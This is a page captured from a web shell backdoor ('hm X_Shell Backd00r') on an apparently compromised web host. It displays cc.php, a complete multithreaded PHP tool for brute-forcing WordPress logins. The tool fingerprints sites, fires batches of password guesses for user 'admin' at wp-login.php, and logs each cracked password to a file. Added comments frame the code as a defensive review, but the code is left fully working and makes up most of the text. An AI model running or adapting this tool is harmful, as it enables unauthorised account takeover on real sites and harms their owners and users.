[#] hm X_Shell Backd00r [#]

Current Path : /var/www/clients/client35/web46/web/buenfin/
Upload File :
Current File : /var/www/clients/client35/web46/web/buenfin/cc.php

<?php

/*
*  Janissaries Wordpress Brute Force Tool with MultiThread
*  Coded By Burtay
*  contact for questions : admin@burtay.org
*  Script Language : Turkish
*  Janissaries.Org
*  Video Tutorial : http://www.youtube.com/watch?v=dIoVglEZYYU
*/

// Analyst note: turns off all PHP error reporting for the rest of the run, so
// failures later in the script (unreadable list files, cURL errors) are not reported.
error_reporting(0);
/**
 * Analyst annotation (defensive review; code left exactly as found).
 *
 * Sends every request body in $postlar to the single URL $site in parallel through
 * one curl_multi handle, then scans each response for two patterns.
 *
 * What this looks like from the target's side: a burst of count($postlar) concurrent
 * requests to one URL from one client, repeated batch after batch by the caller.
 * Per-IP and per-account rate limiting or lockout on the login endpoint is the
 * control this pattern runs into.
 *
 * @param string $site     URL every request in the batch is sent to.
 * @param array  $postlar  List of pre-built request bodies, one per transfer.
 * @param string $aranan   First pattern; spliced into a regex without preg_quote().
 * @param string $aranan2  Second pattern; spliced into a regex without preg_quote().
 * @return int|null 1-based position in $postlar of the first response matching both
 *                  patterns; falls off the end (null) when nothing matches.
 */
function multi($site,$postlar,$aranan,$aranan2)
{
  $toplam_post = count($postlar);
  $curl_multi  = curl_multi_init();
  // One easy handle per request body; all of them target the same URL.
  for($i=0;$i<=$toplam_post-1;$i++)
  {
    $curl[$i]  = curl_init();
    curl_setopt($curl[$i],CURLOPT_URL,$site);
    curl_setopt($curl[$i],CURLOPT_RETURNTRANSFER,1);    
    // Response headers are included in the returned data; the pattern check below
    // runs against that data.
    curl_setopt($curl[$i],CURLOPT_HEADER,1);
    // NOTE(review): NOBODY is set here and POST is enabled a few lines later; which
    // request method actually goes out depends on libcurl's option handling —
    // confirm against captured traffic before writing a method-specific rule.
    curl_setopt($curl[$i],CURLOPT_NOBODY,1);
    // 20-second connect and total timeouts per transfer.
    curl_setopt($curl[$i],CURLOPT_CONNECTTIMEOUT,20);
    curl_setopt($curl[$i],CURLOPT_TIMEOUT,20);
    curl_setopt($curl[$i],CURLOPT_POST,1);
    curl_setopt($curl[$i],CURLOPT_POSTFIELDS,$postlar[$i]);
    curl_setopt($curl[$i],CURLOPT_FOLLOWLOCATION,true);
    curl_multi_add_handle($curl_multi,$curl[$i]);
  }
  // Drive all transfers until $durum (the running-transfer count) reaches zero.
   do
  {
    curl_multi_exec($curl_multi,$durum);
  }
  while($durum>0);
  foreach($curl as $cid => $cson)
  {
    $sonuc[$cid] = curl_multi_getcontent($cson);  
    // Both patterns must appear in the same response for it to count as a hit.
    if(preg_match('/'.$aranan.'/',$sonuc[$cid]) and preg_match('/'.$aranan2.'/',$sonuc[$cid]))
    {
      // Returns immediately, so the handle cleanup loop below is skipped on a hit.
      return $cid+1;
      // Unreachable: follows the return above.
      exit();
    }
  }
  // No response matched: detach and close every handle, then the multi handle.
  for($i=0;$i<=$toplam_post-1;$i++)
  {
    curl_multi_remove_handle($curl_multi, $curl[$i]); 
    curl_close($curl[$i]); 
  }
  curl_multi_close($curl_multi); 
}

/**
 * Analyst annotation (defensive review; code left exactly as found).
 *
 * Fingerprinting step: fetches $site once and treats the response as WordPress when
 * the body contains the literal text "wp-content". In server logs this shows up as
 * a single request for the site root ahead of any login traffic from the same client.
 *
 * @param string $site URL to fetch.
 * @return bool true when "wp-content" is found; false otherwise (after printing a
 *              Turkish "could not be verified as WordPress" message).
 */
function dogrula($site)
{
  $curl  =  curl_init();
  curl_setopt($curl,CURLOPT_URL,$site);
  curl_setopt($curl,CURLOPT_RETURNTRANSFER,1);
  // 20-second connect and total timeouts.
  curl_setopt($curl,CURLOPT_CONNECTTIMEOUT,20);
  curl_setopt($curl,CURLOPT_TIMEOUT,20);
  $calis  =  curl_exec($curl);
  curl_close($curl);
  // The only check is a substring match on the fetched page.
  if(preg_match('/wp-content/',$calis))
  {
    return true;
  }
  else
  {
    // Strip the scheme for display only; the caller's copy of the URL is unaffected.
    $site = str_replace('http://','',$site);
    echo "[+]".$site." Wordpress Olarak Dogrulanamadi...\n";
    echo "##################################\n\n\n";      
    return false;
  }
}

#-------------------------------------------------------------

// Analyst annotation (defensive review; code left exactly as found).
// Driver: reads three values interactively from STDIN (path to a site list, path to
// a password wordlist, batch size), then for each listed site runs the WordPress
// check and submits password guesses in batches to that site's wp-login.php.
// Reading from STDIN suggests command-line use rather than a web request —
// NOTE(review): inferred from the fgets(STDIN) calls; confirm how it was launched.
echo "[+]Site listenizi Girin...\n";
// $site_list  =  $argv[1];
$site_list    =  fgets(STDIN);
$site_list    =  str_replace("\r\n",'',$site_list);
$site_list    =   trim($site_list);
// $wordlist  =  $argv[2];
echo "[+]Wordlist Dosyaninizi Girin...\n";
$wordlist    =  fgets(STDIN);
$wordlist    =  str_replace("\r\n",'',$wordlist);
$wordlist    =  trim($wordlist);
// $thread    =  $argv[3];
echo "[+]Thread Sayisini Girin...\n";
// Batch size = number of concurrent requests per round. Unlike the two values
// above, this one is not passed through trim().
$thread      =  fgets(STDIN);
$thread      =  str_replace("\r\n",'',$thread);
// $timeout  =  $argv[4];
#----------------------------------------------------------------

$time1      =  time();
// Target list: one site per line, exact duplicate lines removed.
$siteler    =  file_get_contents($site_list);
$site_ayir    =  explode("\n",$siteler);
$say1      =  count($site_ayir);
$site_temizle  =  array_values(array_unique($site_ayir));
$say2      =  count($site_temizle);

// Banner and run summary (Turkish): scan started, list/wordlist paths, batch size,
// loaded/duplicate/remaining site counts.
echo "##################################\n";
echo "Janissaries.Org New Generation Security Forum\n";
echo "##################################\n";
echo "[+]Tarama Basladi\n";
echo "[+]Site Listesi -> $site_list\n";
echo "[+]Wordlist -> $wordlist\n";
echo "[+]Thread Sayisi $thread\n";
echo "[+]Yuklenen Site Sayisi ".count($site_ayir)." \n";
echo "[+]AynĂ˝ Siteler Listeden Siliniyor\n";
echo "[+]Tekrar Eden Site Sayisi ".(count($site_ayir) - count($site_temizle))." \n";
echo "[+]Temizleme Sonrasi Site Sayisi ".count($site_temizle)." \n\n";

$saygac  =  0;
foreach($site_temizle as $site)
{
  $saygac++;
  $site  =  trim($site);
  $a     =  "##################################\n";
  $a    .=  "[+]Denenen Site ".$site."  ".$saygac."/".count($site_ayir)."\n";
  echo $a;
  // Entries without "http" anywhere in them are prefixed with plain http://.
  if(!preg_match('/http/',$site)) $site = "http://".$site;
  // Sites whose front page lacks "wp-content" are skipped.
   if( !dogrula($site) )
   {continue;}
  // The wordlist is re-read from disk for every site.
  $pass_oku  = file_get_contents($wordlist);
  $ay      = explode("\n",$pass_oku);
  $c  =  "[+]Yuklenen Password Sayisi ".count($ay)." \n";
  $c .=  "[+]Coded By Burtay |||| Janissaries.Org\n";
  echo $c;
  // Split the guesses into batches of $thread; each batch is one parallel burst.
  $pass_array    = array_chunk($ay,$thread);
  $thread_count  = count($pass_array);
  $saygac2    = 0;
  for($x=0;$x<=$thread_count-1;$x++)
  {    
    $saygac2  =  $saygac2 + $thread;
    $time3    =  time();
    $postlar  = array();
    foreach($pass_array[$x] as $password)
    {
      // Detection fingerprint: the username is always the literal "admin", and
      // urlencode() wraps $site together with "&testcookie=1&wp-submit=Log In", so
      // those two fields arrive inside the redirect_to value instead of as separate
      // form parameters. The password is inserted without URL-encoding.
      $post  =  "log=admin&pwd=".trim($password)."&redirect_to=".urlencode($site."&testcookie=1&wp-submit=Log In");
      array_push($postlar,$post);
    }
    // A guess counts as successful when the response data contains both
    // "wordpress_logged_in" and "Location". Defensive counterparts: login rate
    // limiting/lockout, MFA, and alerting on repeated failed logins for "admin".
    $sonuc = multi( $site."/wp-login.php",$postlar,'wordpress_logged_in','Location');
    if($sonuc != null)
    {
      $time4 = time();
      $b =  "[+]Password Bulundu -> ".$pass_array[$x][$sonuc-1]. "\n";
      $b .= "[+]Sifrenin Kirilma Suresi -> ".($time4-$time3)."\n" ;
      $b .= "##################################\n\n\n";
      echo $b;
      // Forensic artifact: each hit is appended to "wordpress_log.txt", a relative
      // path, so the file lands in the process's working directory. Finding it on a
      // host means the site and password it names should be treated as exposed.
      yaz("wordpress_log.txt",$a.$c.$b);
      break;
    }
    elseif($x == $thread_count-1 )
    {
      // Last batch finished with no hit ("password not found").
      echo "[+]Password bulunamadi...\n";
      echo "##################################\n\n\n";
    }
    unset($postlar);
  }  
}
$time2  =  time();
// Total run time in seconds.
echo "Script Tamamlanma Suresi ".($time2 - $time1) ." Saniye";

/**
 * Analyst annotation (defensive review; code left exactly as found).
 *
 * Appends $content to $file. The main loop calls this to record each hit in
 * "wordpress_log.txt", so that file is an artifact to look for during triage.
 *
 * @param string $file    Path opened in append/binary mode ('ab').
 * @param string $content Text to append.
 * @return resource|false Whatever fopen() returned; the handle is not closed here.
 */
function yaz($file,$content)
{
  $fopen = fopen($file,'ab');
  fwrite($fopen,$content);
  return $fopen;
}
?>

Mr.hm X_Shell Backd00r 1.0, Coded By Mr.hm X_Shell Backd00r